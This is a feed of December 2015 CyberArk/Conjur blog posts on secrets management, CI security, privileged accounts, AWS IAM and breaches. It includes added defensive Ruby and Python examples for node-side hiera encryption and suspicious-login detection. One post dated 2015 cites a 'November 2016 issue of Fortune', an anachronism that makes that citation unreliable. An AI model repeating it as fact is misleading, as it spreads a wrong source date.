Conjur’s authorization platform in combination with SSH’s automated authentication creates a new standard in enterprise identity management solutions. This partnership will allow us to provide our customers with comprehensive security controls that both support efficient delivery of business objectives and provide the governance needed for compliance and audit.


Working with SSH’s CryptoAuditor encrypted channel monitoring solution, Conjur can operate in any elastic cloud environment via a lightweight deployment while maintaining its regular flexibility and ease of use.

Conjur + SSH provides customers with three main advantages. It allows them to:

  1. Audit encrypted traffic efficiently: intercept, monitor, record, and replay the content of the most common data-in-transit encryption protocols

  2. Connect credentials: tie credentials, including SSH keys, to a given user and then control the commands that user is allowed to execute

  3. Automate machine-based security: in both cloud and hybrid cloud infrastructures

For more information about the partnership, take a look at the full press release.

]]>
Puppet and Node-Side Secrets https://www.cyberark.com/blog/puppet-and-node-side-secrets/ Wed, 16 Dec 2015 19:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppet-and-node-side-secrets/  

Earlier this week one of our platform developers, Rafal Rzepecki, had the opportunity to guest blog on the Puppet Labs blog. You can view the original blog post here.

Rafal’s post was inspired by the presentation our Vice President, Josh Bregman, gave at PuppetConf back in October. Josh’s presentation focused on using Puppet with a secrets server. You can watch the video of Josh’s presentation here.

In Rafal’s blog post, he discusses how, in today’s modern infrastructure environments, machines are as distrustful of one another as they are of humans. This dynamic creates a need for enterprises to give every component of their infrastructure an identity backed by secrets, so that trust, collaboration, and security remain priorities in an automated environment.

Rafal goes on to show how putting these secrets in things like configuration management files may seem like a good idea, but in reality these files end up in the company Git repository, making them freely available to everyone who has access to Git. Not ideal.

The solution Rafal proposes is to encrypt the hiera YAML data for each host so that only that node can decrypt it, and to have the node itself do the decryption, so that plaintext secrets never pass through the puppet master. With this configuration a compromise of the master is far less damaging: an attacker who controls it cannot surreptitiously read the secrets of other systems. The master can still push manifest changes that make nodes extract their secrets and send them somewhere, but the manifest changes required would make such an attack much more visible.
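As an added illustration of the node-side principle described above (example code written for this page, not code from Rafal’s post, the Conjur Puppet module, or any Puppet or hiera API), the Ruby below shows why per-node encryption keeps the master out of the secret path: each node holds an RSA private key that never leaves it, the hiera data written for that node carries only ciphertext, and decryption with any other key fails. The ENC[...] wrapper, the key names and the demo password are constructed for this example.

```ruby
require 'openssl'
require 'base64'
require 'yaml'

# Added example: one RSA keypair per node; only the public half is ever handed
# to whoever writes that node's hiera data (the master, or a human operator).
# The ENC[...] wrapper and the value names are constructed for this example,
# not Puppet or hiera conventions.

OAEP = OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING
# 2048-bit RSA with OAEP(SHA-1) can encrypt at most 214 bytes in one block;
# stay well under it and refuse anything larger (wrap a symmetric key instead).
MAX_PLAINTEXT = 200

# Node side: generate the node's keypair. Only the public PEM is exported.
def generate_node_key
  OpenSSL::PKey::RSA.new(2048)
end

# Master (or author) side: build the hiera YAML for one node. Every value is
# encrypted to that node's public key, so the file is safe to keep on the
# master or commit to git; it contains no plaintext.
def build_encrypted_hiera(node_public_pem, secrets)
  pub = OpenSSL::PKey::RSA.new(node_public_pem)
  data = secrets.each_with_object({}) do |(name, value), h|
    if value.bytesize > MAX_PLAINTEXT
      raise ArgumentError, "#{name}: #{value.bytesize} bytes exceeds one RSA block; wrap a symmetric key instead"
    end
    h[name] = "ENC[#{Base64.strict_encode64(pub.public_encrypt(value, OAEP))}]"
  end
  YAML.dump(data)
end

# Node side: decrypt the values with the node's own private key. A master or
# another node holding only the public key cannot perform this step.
def decrypt_hiera(yaml_text, node_private_key)
  YAML.safe_load(yaml_text).transform_values do |v|
    m = v.match(%r{\AENC\[([A-Za-z0-9+/=]+)\]\z})
    raise "value is not an ENC[...] ciphertext" unless m
    node_private_key.private_decrypt(Base64.strict_decode64(m[1]), OAEP)
  end
end

# Walk through the flow and report what each party can see.
def node_side_secrets_demo
  node_key  = generate_node_key
  other_key = generate_node_key            # a different node, or a master trying to peek
  secret    = 'example-db-password-not-real' # constructed demo value

  hiera_yaml = build_encrypted_hiera(node_key.public_key.to_pem, 'db_password' => secret)

  # OAEP decryption under the wrong key fails its integrity check rather than
  # returning garbage, so a compromised master gets an error, not a secret.
  wrong_key_succeeds = begin
    decrypt_hiera(hiera_yaml, other_key)
    true
  rescue OpenSSL::PKey::PKeyError
    false
  end

  {
    plaintext_in_yaml:  hiera_yaml.include?(secret),                       # false
    recovered_on_node:  decrypt_hiera(hiera_yaml, node_key)['db_password'], # the secret
    wrong_key_succeeds: wrong_key_succeeds                                   # false
  }
end

puts node_side_secrets_demo.inspect if $PROGRAM_NAME == __FILE__
```

Run it with ruby and it reports three facts: the YAML never contains the plaintext, the node recovers it, and a second key (another node, or a master that tries to peek) cannot. In a real deployment the decrypt step would sit in a node-side hiera backend or an agent-side function, and secrets longer than one RSA block would be wrapped with a symmetric key rather than encrypted directly; both are assumptions of this example, not Puppet features the post describes.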

You can read through Rafal’s full explanation, complete with sample code, on the Puppet Blog.

]]>
Continuous Integration Insecurity https://www.cyberark.com/blog/continuous-integration-insecurity/ Thu, 10 Dec 2015 18:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/continuous-integration-insecurity/  

We at Conjur see little value in fear as a motivator. Whenever we do find legitimate reasons to be afraid, we like to build them into constructive conversations around better practices.

Today’s focus is on (in)security for continuous integration (CI) tools.

This year, penetration tester and infosec researcher Nikhil Mittal gave the same presentation at both Black Hat conferences (USA and Europe). Mittal isn’t being lazy; he’s being relevant. For his talk “Continuous Intrusion: Why CI tools are an attacker’s best friends,” he tested five different tools (Jenkins, CruiseControl, Go, TeamCity, and Hudson) and found serious security issues with all of them.

When I say serious, I’m talking fundamental infrastructure security threats.

Thanks to low default security settings and practices that are far from “best,” Mittal shows that gaining access to CI tools can result in ownership over anything from the build process, source code, Git credentials, SSH keys, even all the way down to the machines running the slaves.

The bluntest version:

“I have not been through a single Pen Test or Red Team engagement where access to a CI tool did not result in Domain Admin access.”

The better practices he outlines are the classics for any automation tool:

  • password policy enforcement
  • more security-conscious configuration and development
  • eliminating plaintext credentials on the master

These are fantastic first steps, but they fall short of best practices, especially from an audit and compliance standpoint.

Our technical wizards have been hard at work lately putting together the Ten Factor CI Job.

Beyond these standards, it would also be great to see an iteration of Mittal’s test with Conjur’s orchestration platform providing auditable role-based identity and access management for the CI tool masters, slaves, and teams of users.

Conjur’s Jenkins solution, for example, not only secures all the credentials and keys that might otherwise wind up in source control; our RBAC model also allows fine-grained, temporary access to jobs and manages privileged access for engineers.

Awareness is always the first step, and for raising it with reference to CI insecurity, we thank Nikhil. Now it’s time to take steps two, three, and beyond…

]]>
Global Survey: What Can IT Security Teams Do to Better Educate Executives on Cyber Security? https://www.cyberark.com/blog/global-survey-what-can-it-security-teams-do-to-better-educate-executives-on-cyber-security/ Wed, 09 Dec 2015 15:31:19 +0000 https://www.cyberark.com/blog//

Earlier this year, thousands of corporate executives from leading global organizations convened in Switzerland for the World Economic Forum. Cyber security was among the key discussion topics. According to The National Cybersecurity Institute’s synopsis of the discussion, “All agreed that cyber security is a mainstream business concern now. Alliances, information sharing about attacks, and combat measures are increasing. CEOs and world leaders are paying attention now. They are realizing that significant attacks pose an enormous threat to profitability and reputation.”

It’s encouraging to see reports of heightened cyber security awareness, but there is still work to be done for better alignment between enterprise CEOs and their IT security teams. This is underscored by our newly released survey, “The Gap Between Executive Awareness and Enterprise Security,” which found that 69 percent of IT security professionals believe cyber security is too technical for CEOs and 53 percent of CEOs make business decisions without regard to cyber security. The independent study, conducted by Dimensional Research, surveyed 304 global IT security professionals to determine how they view CEO leadership on cyber security issues, in order to drive productive conversations that prioritize enterprise security. The findings show that IT security practitioners increasingly believe they need greater cyber security leadership from their executives.

IT security professionals rely on executive level leadership on security issues, and CEOs increasingly rely on their IT security teams to provide the security information that matters. The survey shows that the cyber security awareness gap may be driven in part by the need for security teams to properly inform CEOs about what’s business critical when it comes to security.

Today, one-third of CEOs and 43 percent of management teams are still not regularly briefed on cyber security issues and related business risks. While 59 percent of respondents stated that threat detection metrics are the most effective for measuring security program effectiveness, 79 percent simply provide compliance and audit findings to their CEOs and executive teams to demonstrate security effectiveness.

Compliance does not equal security. It can lull a CEO into a state of complacency because all it demonstrates is a simple checking of a box without context for responsible levels of information protection.

Security professionals need to arm their CEOs and executive teams with information such as threat detection and risk metrics versus compliance and system availability. This can also help organizations to prepare for 2016 initiatives. Of note, endpoint security and privileged account security were cited as the top two organizational security priorities for the coming year. The C-suite will want to understand these priorities, so it will be important to share related and appropriate metrics.

The full survey is available here. For tangible guidance on how to build effective cyber security programs, download and read “The Balancing Act: The CISO View on Improving Privileged Access Controls.”  This report features advice from a panel of CISOs from global 1000 enterprises about how to lead a comprehensive privileged account security program including recommendations for getting executive buy-in, delivering metrics that matter, and measuring effectiveness of the controls. The report is available for free at https://www.cyberark.com/cisoview.

]]>
How To Securely Scale Continuous Integration https://www.cyberark.com/blog/how-to-securely-scale-continuous-integration/ Wed, 09 Dec 2015 14:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-securely-scale-continuous-integration/  

At Conjur, we’ve developed the principles of the Ten-Factor CI Job to inform how we build and test our software. Applying these principles has allowed us to create our software rapidly, reliably, and reproducibly.


Here’s how we’ve applied each of the ten factors:

1)  Codebase: All code, including the description of the Jenkins jobs, gets committed to GitHub repos. We use the Jenkins Job DSL Plugin to create our jobs and these definitions are stored in a repo, too. Each of our jobs has a single script that runs tests.

2)  Dependencies: Most jobs use Docker containers to manage dependencies. Slaves are all configured using a Chef cookbook so we know exactly what is installed. Slaves are conjurized: we use Conjur SSH to control who gets access to the slave and what commands can be run on it.

3)  Config: We use Summon to fetch any secrets required for build, test, and deploy from a Conjur server.

4)  Backing Services: Many of our jobs rely on a running Conjur appliance. We use a local Docker registry to store a preconfigured appliance image. Any job that needs an appliance can start a container from it.

5)  Build, Release, Run: Storing the DSL for our jobs in git means that they are versioned. If we need to recreate a build, we can go back and find the exact job that created the artifact.

6)  Processes: All of our Jenkins jobs delete the workspace before they start. Any required images are pulled from the local registry as part of initialization.

7)  Disposability: Docker containers make this easy, but there are two things to watch out for: transient, job-related images should build quickly, and containers should be run with --rm. Maximizing layer reuse is an important technique for making the transient images build quickly. For example, many of our projects use bundler for gem management. The Dockerfile used to build an image to test such a project has lines like these in it:

    # Copy only the dependency manifests first (and the gemspec, if appropriate)
    ADD Gemfile Gemfile.lock ./
    RUN bundle install --deployment
    # Now add the rest of the source code; edits here don't invalidate the bundle layer
    ADD . ./

Structuring the Dockerfile this way allows reuse of the layer created by the bundle install, as long as the Gemfile and Gemfile.lock remain unchanged. This can be a big time saver.

8)  Dev/Prod parity: That single script from Factor 1 will run on a dev laptop, as well as on the Jenkins slave. As mentioned above, our Jenkins slaves get created from a Chef cookbook. We use Vagrant to create the slaves, allowing us to spin up an AWS instance (connected to our Jenkins master), or a VirtualBox VM (for developer use).

9)  Logs: Jobs that run in containers write to stdout and stderr, each of which gets captured by Jenkins. Test output gets written in JUnit format and we use the Jenkins JUnit Plugin to publish them.

10)  Audit: All access of secrets by a Jenkins slave during build and test gets audited in Conjur. If other information needs to be captured, custom audit records can be created.

Here are some other things to consider:

Make sure your Jenkins slaves are cattle, not pets. Sometimes, the expedient thing is to “fix the build machine” when a job breaks. But if this isn’t also accompanied by updates to the machine description (e.g. by changing the Chef recipe), you’re asking for trouble.

As your teams grow, you can use Jenkins folders along with the Conjur Jenkins plugin to manage permissions for Jenkins jobs. Even if you conjurize your Jenkins slaves, each still only has a single identity. If teams, each of which should have disjoint sets of permissions, share Jenkins slaves, it’s hard to manage and audit what the teams are doing. If you use the CloudBees folder plugin to segregate teams, you can use the Conjur Jenkins plugin to give an identity to each job run by a team.

Having separate identities for “build” and “publish” follows the principle of least-privilege and allows for better auditing of the provenance of an artifact.

Check here for more details on how Conjur helps secure Jenkins.

Is There a Perfect Storm on the Horizon as Businesses Address Cyber Security and Make a Digital Transformation? https://www.cyberark.com/blog/is-there-a-perfect-storm-on-the-horizon-as-businesses-address-cyber-security-and-make-a-digital-transformation/ Tue, 08 Dec 2015 19:24:20 +0000 https://www.cyberark.com/blog//

Reflecting on the ability of businesses to take advantage of new technologies and digital transformation, Christoph Kilger, partner at Ernst & Young, Germany was recently quoted, “Concerns around IT security are holding them back and many are still locked in a traditional, conservative way of thinking.”

That may be the case for some companies, but the world is rapidly changing and there are plenty of businesses that have made the transition or launched with a new business model. Innovative companies understand cyber security concerns are persistent in a digital economy, but addressable with proactive mitigation.

In the November 2016 issue of Fortune, Geoff Colvin asked readers to “Imagine an economy without friction – a new world in which labor, information, and money move easily, cheaply and almost instantly.”

Not only can we imagine it, we live it. Uber, Airbnb and many others are examples of this new economy that relies heavily on technology to connect people with products or services. When a company makes a digital transformation, technology is the backbone of the business. This ecosystem extends from websites and social media channels, to marketing automation and sales management tools. It covers supply chain management, communication systems, commercial transactions and more.

Nicholas Evans, VP & GM at Unisys, recently offered 6 steps for digital transformation, and noted, “Advanced cybersecurity is a key enabler because when emerging technologies are not secure from the start, they create delays in realizing their full business benefits as organizations struggle to implement appropriate security controls.”

With this in mind, it’s easy to understand why security is a strategic part of business today, and it does not go unnoticed by the C-Suite.

According to an October 2015 Gartner press release, “Gartner says Cybersecurity professionals are the new guardians of digital change.*” That’s a lot of responsibility – in addition to the usual expectations. Do we have enough qualified pros available to take this responsibility head on? Statistics show there is a cyber security skills gap. A Frost & Sullivan report predicts a shortfall of global information security workforce will reach 1.5 million in five years.

The ISACA and RSA Conference Survey, “State of Cybersecurity: Implications for 2015” reports that it is not only difficult to find qualified cyber security professionals but, once hired, there is often a skills gap in their ability to understand the business, more so than in their technical and communication skills.

This sentiment is echoed by one of CyberArk’s customers, Jim Motes the CISO of Rockwell Automation.  In a recent CIO Magazine article, he lamented, “We have a shortage of cybersecurity professionals, with people shoved into jobs [they] are not qualified to do…..We have a stressed-out work force, a shallow talent pool and an increase in demand like nothing we’ve ever seen before.”

A forward-thinking CISO, he proposes a co-op of seasoned information security professionals as a way of addressing the cyber security skills gap.  Operating like a managed security service provider, he believes the co-op, for example, would be well-positioned to protect privileged user accounts which are the preferred path hackers take to a company’s most valued data.

Motes has also shared his experience on rolling out security programs in “The Balancing Act: The CISO View on Improving Privileged Access Controls.”

When it comes to security and 21st century business, we don’t have the luxury of time. Speed is everything in a digital economy.  While we nurture the next crop of IT security professionals and enable them to be the “guardians of digital change,” it is important to facilitate opportunities where peers can learn from each other and share best practices.

Jim Motes embraces this, and so does CyberArk.  CyberArk launched The CISO View – an industry initiative that explores CISO perspectives on topics related to improving privileged access controls and shares practical, peer-driven advice on security strategies. Learn more here and share your ideas.

*Gartner Press Release, Gartner Says Cybersecurity Professionals Are the New Guardians of Digital Change, October 7, 2015, http://www.gartner.com/newsroom/id/3144319

The Unlucky 13: 2015’s Biggest Breaches https://www.cyberark.com/blog/the-unlucky-13-2015s-biggest-breaches/ Tue, 08 Dec 2015 14:37:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-unlucky-13-2015s-biggest-breaches/  

We’re approaching 2016 and it looks like we are headed for another year filled with costly data breaches. Every week it seems that a new company has left our data susceptible to cybercriminals and we are forced to monitor our accounts, waiting for suspicious activity. Despite the bad press, poor reputation, and high prices that come along with data breaches, enterprises are still failing to place security at the top of their to-do list.

The Ponemon Institute reports that the average data breach costs companies approximately $3.8 million. This year, millions of consumer records were exposed. Take a look at 13 of the biggest data breaches of 2015, which together exposed nearly 208 million records.

[Infographic: Conjur data breach timeline, 2015]

Like the graphic? You can download it here.

Want to avoid having your name featured on next year’s timeline? Sign up for a demo and learn how Conjur can help you secure your infrastructure.

Cyber Security Experts Recommend Eight Ways to Reduce the Misuse of Privileged Accounts https://www.cyberark.com/blog/cyber-security-experts-recommend-eight-ways-to-reduce-the-misuse-of-privileged-accounts/ Mon, 07 Dec 2015 19:02:12 +0000 https://www.cyberark.com/blog//

Last year, CyberArk issued a threat report: “Privileged Account Exploits Shift the Front Lines of Cyber Security.”  The key findings provide an excellent primer on the role of privileged accounts in targeted attacks. The full report is a must read for security teams charged with proactively protecting internal networks.

The report is based upon interviews with seasoned threat investigators at five firms renowned for detecting, analyzing and remediating serious cyber security incidents at Global 1000 companies:

  • Cisco Talos Security Intelligence and Research Group
  • Deloitte & Touche LLP’s Cyber Risk Services and Deloitte Financial Advisory Service LLP’s Computer and Cyber Forensics Team
  • Mandiant, a FireEye Company
  • RSA, the Security Division of EMC
  • Verizon RISK Team, Verizon Enterprise Solutions

In the report, these experts provided basic guidance to help companies detect and reduce misuse of privileged accounts:

  1. Know what privileged accounts you have, what they do and are supposed to do. Consider IT administrative credentials, default and hard-coded passwords, application backdoors, SSH keys, etc. Then, limit those privileges as much as possible to reduce the potential for abuse.
  2. Improve security of privileged accounts by changing default passwords and using different administrative passwords on each system. If attackers gain privileged access to one system, they usually will try the same password to gain access to all other similar systems within the company.
  3. Enforce one-time passwords that expire after a single use. For further protection, companies can encrypt their privileged account credentials and automate credential rotation.
  4. Proactively monitor privileged accounts and how they interact with data and technology assets. Do not passively wait for security tools to alert you of a problem. For example, scout for admin credentials that should not be accessing certain types of systems or for domain admins logging into many different parts of the network. If a privileged user is VPNing into the network from multiple far-flung locations in a short amount of time, that’s often a sign of fraudulent access.
  5. Perform regular, recurrent “housekeeping” of information assets and how they’re accessed. Develop and employ tight governance practices around the provisioning of user access and privileges and around data and asset classification. Scrub your Active Directory and all authentication/access points. Decommission privileged accounts that haven’t been used recently. Many will likely be service accounts with fixed credentials.
  6. Monitor and limit the privileges of service accounts. For example, if an account runs a particularly important service, it should never have remote access. In many cases, it shouldn’t even be usable through a graphical user interface (GUI). For example, a service account running a database should never need a GUI to access its services.
  7. Apply patches as quickly as possible. Many companies worry about zero day vulnerabilities, but such exploits are so valuable that attackers use them only in special circumstances and hardly ever on a widespread basis. For every zero day you hear about, there are millions of known vulnerabilities that can be eliminated through patching.
  8. Practice classic defense in depth. The more overlapping security layers in your environment, the more you lower your risks. Reducing vulnerabilities in privileged accounts can greatly impair the ability of attackers to maneuver within and manipulate critical IT systems.
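Two of the checks item 4 describes, privileged VPN logins from far-apart locations in a short window and a domain admin logging in to many different parts of the network, can be scripted against existing authentication logs. The example below is added here and is not from the report or from CyberArk; the log format, field names, privileged-user list, thresholds and every sample record are constructed for illustration, so the parser will need adapting to a real VPN concentrator or domain controller export.

```python
"""Added example: two privileged-account monitoring checks over constructed log lines.

  * impossible_travel: consecutive VPN logins by the same privileged user whose
    implied travel speed is not physically plausible
  * host_fanout: a privileged account logging in to more than N distinct hosts
    inside a sliding time window

Log format (constructed for this example):
  <ISO timestamp> <event> user=<name> src=<ip or host> [geo=<lat>,<lon>]
"""
from collections import defaultdict
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Constructed sample records: documentation IPs, fictitious hostnames and users.
SAMPLE_LOG = """\
2015-12-07T08:00:00 vpn_login user=dadmin src=203.0.113.10 geo=42.36,-71.06
2015-12-07T08:20:00 vpn_login user=dadmin src=198.51.100.7 geo=51.51,-0.13
2015-12-07T09:00:00 vpn_login user=jsmith src=203.0.113.44 geo=42.36,-71.06
2015-12-07T09:05:00 vpn_login user=jsmith src=203.0.113.45 geo=42.37,-71.05
2015-12-07T10:00:00 host_login user=dadmin src=fileserver01
2015-12-07T10:01:00 host_login user=dadmin src=fileserver02
2015-12-07T10:02:00 host_login user=dadmin src=hr-db01
2015-12-07T10:03:00 host_login user=dadmin src=finance-app01
2015-12-07T10:04:00 host_login user=dadmin src=dev-build03
2015-12-07T10:05:00 host_login user=dadmin src=mail01
2015-12-07T10:30:00 host_login user=svc_backup src=fileserver01
"""

# Constructed: in practice this comes from your privileged-account inventory (item 1).
PRIVILEGED_USERS = {"dadmin", "svc_backup"}


def parse_line(line):
    """Turn one constructed log line into a dict; geo becomes a (lat, lon) tuple."""
    ts, event, *pairs = line.split()
    rec = {"ts": datetime.fromisoformat(ts), "event": event}
    for item in pairs:
        key, value = item.split("=", 1)
        rec[key] = value
    if "geo" in rec:
        lat, lon = rec["geo"].split(",")
        rec["geo"] = (float(lat), float(lon))
    return rec


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points in degrees."""
    lat1, lon1 = map(radians, a)
    lat2, lon2 = map(radians, b)
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def impossible_travel(records, max_speed_kmh=900.0, min_distance_km=500.0):
    """Flag consecutive privileged VPN logins whose implied speed exceeds max_speed_kmh.

    Returns (user, previous_src, current_src, distance_km) tuples. The minimum
    distance keeps neighbouring offices and mobile carrier NAT from alerting.
    """
    by_user = defaultdict(list)
    for r in records:
        if r["event"] == "vpn_login" and r["user"] in PRIVILEGED_USERS:
            by_user[r["user"]].append(r)
    alerts = []
    for user, logins in by_user.items():
        logins.sort(key=lambda r: r["ts"])
        for prev, cur in zip(logins, logins[1:]):
            dist = haversine_km(prev["geo"], cur["geo"])
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600.0
            if dist >= min_distance_km and (hours == 0 or dist / hours > max_speed_kmh):
                alerts.append((user, prev["src"], cur["src"], round(dist)))
    return alerts


def host_fanout(records, window=timedelta(hours=1), max_hosts=5):
    """Flag privileged users that log in to more than max_hosts distinct hosts within `window`."""
    by_user = defaultdict(list)
    for r in records:
        if r["event"] == "host_login" and r["user"] in PRIVILEGED_USERS:
            by_user[r["user"]].append(r)
    alerts = []
    for user, logins in by_user.items():
        logins.sort(key=lambda r: r["ts"])
        for i, start in enumerate(logins):
            hosts = {r["src"] for r in logins[i:] if r["ts"] - start["ts"] <= window}
            if len(hosts) > max_hosts:
                alerts.append((user, len(hosts)))
                break  # one alert per user per run is enough
    return alerts


def run(text=SAMPLE_LOG):
    records = parse_log(text)
    return {"impossible_travel": impossible_travel(records), "host_fanout": host_fanout(records)}


if __name__ == "__main__":
    for kind, alerts in run().items():
        for alert in alerts:
            print(kind, alert)
```

On the constructed input, the admin account is flagged twice: a 20-minute gap between a Boston and a London VPN login implies a speed far above anything a person can travel, and six distinct hosts in five minutes trips the fan-out threshold; the non-privileged user moving between adjacent addresses produces nothing. The thresholds are deliberately parameters, since the right values depend on how your administrators actually work.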

As the year winds down, and you begin to plan for 2016, it’s a good time to review insights from security experts to ensure your proactive security measures reflect best practices. If you haven’t read this report, now is the time. Download the full threat report: Privileged Account Exploits Shift the Front Lines of Cyber Security.

Privileged Credentials in COTS Applications: What IT Pros and Their Application Providers Need to Know Now https://www.cyberark.com/blog/privileged-credentials-in-cots-applications-what-it-pros-and-their-application-providers-need-to-know-now/ Fri, 04 Dec 2015 20:36:42 +0000 https://www.cyberark.com/blog//

Organizations recognize the importance of locking down privileged account access. As they proactively build enterprise-wide security programs, they also increasingly understand this access is not limited to users with a “heartbeat.” Third party, commercial off-the-shelf (COTS) applications often require the same level of access to privileged accounts that an IT Administrator or DBA needs to do his or her day-to-day work.

In the case of a COTS application, the credentials are used to gain access to a given target in order to perform a task – such as resetting a service, conducting a vulnerability scan or initiating a back-up. From a risk perspective, it’s important to not only understand this is the same level of powerful admin access, but also how pervasive an application’s access is across an organization. Considering the number of COTS applications within an enterprise can be in the thousands and the types of key processes that these apps repetitively do on a daily basis, the magnitude of risk to the enterprise can start to be appreciated.

The fact that the privileged credentials accessed by applications are often not well maintained, managed, secured or even tracked exacerbates the risk. Why aren’t these credentials better managed? There are a number of reasons. For example, they are not frequently updated because it’s a cumbersome process if it’s not automated.  IT admins don’t always want to change embedded passwords because they don’t know what other systems could be negatively impacted. In that case, operations takes priority over security. Some vendors even tell companies not to change the credentials because they don’t know what will happen. That’s scary to us and inviting to a potential attacker.

So with this in mind, you might ask again, ‘why does an application need to reach out and log in to a target system?’ There is a wide range of critical functions, including:

  • Restart a service
  • Set a policy
  • Provision an SSL certificate
  • Do a vulnerability scan
  • Define identity configurations
  • Do an asset discovery
  • Initiate a backup
  • Validate a service ticket
  • Import/Export data
  • Execute DevOps read/writes

Based on this, a growing number of our customers now have a ‘mandate’ to improve privileged credential management horizontally – across all ‘people’ users as well as applications that leverage privileged access. To address the latter requirement, customers often ask us to work with their application vendor to ensure they can effectively meet this mandate. Customers want the application’s credentials to be secured and managed via their existing CyberArk deployment.

Some of the types of applications that customers have requested work with CyberArk to securely retrieve and use privileged credentials include:

  • Vulnerability Management
  • IT Operations Management
  • DevOps
  • Data Backup
  • Discovery
  • IAM/Governance Tools
  • Configuration Management
  • Orchestration
  • Data Management/ETL applications
  • Cloud tools

As a result, we have a rapidly growing roster of technology partners that integrate with CyberArk via our Application Identity Manager API. This allows the application vendors to focus on their core competencies, while leveraging the privileged credential management expertise and capability that CyberArk provides to more than 2000 customers worldwide. In addition, they’re delivering this integration to market and using it as a competitive differentiator.

Collectively, this is a positive development in the market. Customers have a better understanding of cyber security risks and increasingly take proactive measures to mitigate risk. Technology vendors are beginning to do the same.  Enterprise security requires a collaborative approach that extends beyond any one vendor and customer. Better integration and informed decisions improve the entire technology ecosystem.

Technology vendors interested in integration opportunities with CyberArk should contact us directly for more information: https://www.cyberark.com/contact/.

How To Improve AWS IAM Security https://www.cyberark.com/blog/how-to-improve-aws-iam-security/ Thu, 03 Dec 2015 14:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-improve-aws-iam-security/  

Although many of us love AWS and the Identity and Access Management system for EC2, the workflows around it need some improvement. If you’ve ever used it, you’ll probably understand what we’re talking about…It’s hard to configure, hard to understand, and hard to troubleshoot.

Luckily, Conjur lets you manage end user access to the AWS console while avoiding the typical governance and compliance nightmare.

[Image: IAM overview]

There are a few reasons AWS IAM needs improvement:

  1. First, users are provisioned manually which means, without attention, user access may persist after the termination of employment.

  2. Validating user control is also very difficult. It can be a challenge ensuring that the principle of least privilege is upheld among each user and as you add and maintain more users, it turns into a bigger headache.

  3. High flexibility leaves room for error.

  4. Vendor lock-in: You can’t rely on IAM roles to manage permissions in your on-premise data centers or other cloud providers.

  5. Additionally, IAM does not manage anything at the web traffic or Unix permissions level.

Here’s How Conjur Solves these Problems:

  1. Users and groups are synchronized from your existing enterprise LDAP or Active Directory Server.

    • This allows you to use your existing user/group structure instead of creating and maintaining another one.

  2. Roles are created for machines, allowing them to join a specific layer of hosts.

    • There is a role per type of application, webservice, database, etc.

  3. Users can SSH to a trusted machine which has the permissions to fetch an IAM user’s credentials.

    • This SSH access is governed by Conjur.

  4. Privilege on the trusted machine is restricted by the group, mapping your existing enterprise structure to permissions via `sudoers.d`

  5. Next, scripts will be run that fetch the required credentials without revealing them to the executing user.

  6. Finally, Conjur will audit the execution of these scripts.

We take the headache out of managing user access to the AWS console. Have any questions? Let us know! We would love to chat about how Conjur can help better secure your AWS or hybrid cloud environment.

The VTech Hack, Exposing Thousands of Children’s Data https://www.cyberark.com/blog/the-vtech-hack-exposing-thousands-of-childrens-data/ Wed, 02 Dec 2015 20:46:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-vtech-hack-exposing-thousands-of-childrens-data/  

It looks like another tech company has been added to the naughty list. Children’s toymaker VTech has been hacked, the breach affecting over 5 million customers. The worst part?… This time it’s our children’s information that’s at risk.  

In response to the November 14th breach of its Learning Lodge app store, VTech suspended its app stores across the world. The hack affected 5 million customers, revealing names, email addresses, passwords, IP addresses, mailing addresses, download histories, and secret questions as well as the genders and birthdays of the children in the VTech database.

Here’s everything you need to know:

VTech has confirmed that 4.9 million parent accounts were compromised, and 6.4 million related children’s profiles tied to those accounts were also exposed. NBC News points out that VTech is working to downplay the hack by assuring customers that credit card information was not compromised. It is important to note that although you can cancel an exposed credit card and eliminate most risk, you can’t simply retract your children’s leaked personal information; once it’s out there, it’s out there.

Wired reports that the breach went unnoticed for 10 days. Although this seems to be an improvement over other breaches that have gone unnoticed for months, it is still unsettling to realize that a majority of breaches are not discovered immediately.

This piece from engadget points out that this story is particularly interesting because it involves products for children, which typically don’t get much coverage when it comes to data security. This observation begs the question, should companies geared toward children put an even bigger focus on data security than companies selling to adults?  

Security analyst Troy Hunt has a very different story and perspective than VTech. According to Hunt, 227,000 of the 4.8 million people affected were children. Hunt argues that, contrary to claims by VTech, the kids’ passwords that were stolen weren’t encrypted at all.

The scariest aspect of this breach is that children’s photos were stored on the breached database, as well as chat logs between parents and their kids. VTech still hasn’t clarified why this type of information was kept there in the first place.

It seems now that every company is a target, regardless of their industry, because of the vast amount of information that is being captured. It is important for companies to keep in mind that both applications and infrastructure are vulnerable to these types of attacks. Because of this, it is crucial to have a solution to identify, authorize, and audit all of these rapidly moving parts. As companies move faster to stay ahead of the competition, they increasingly run the risk of sacrificing security, and put their sensitive data at risk.

Contextualizing Privileged Account Security for the C-Suite: The Importance of CISO Communication Skills https://www.cyberark.com/blog/contextualizing-privileged-account-security-for-the-c-suite-the-importance-of-ciso-communication-skills/ Tue, 01 Dec 2015 22:37:42 +0000 https://www.cyberark.com/blog//

In a recent Fortune Magazine article, “The 21st Century Club,” Editor Alan Murray wrote, “We are now in the early stages of a third Industrial Revolution, with an entirely different economic logic that is causing fundamental changes in the structure of business.” He also noted, “The 21st century will belong to those who embrace that disruption rather than fight it.” This is also an era of fierce competition and today’s C-level leaders face tremendous pressure to innovate and grow while driving digital transformation across their organizations.

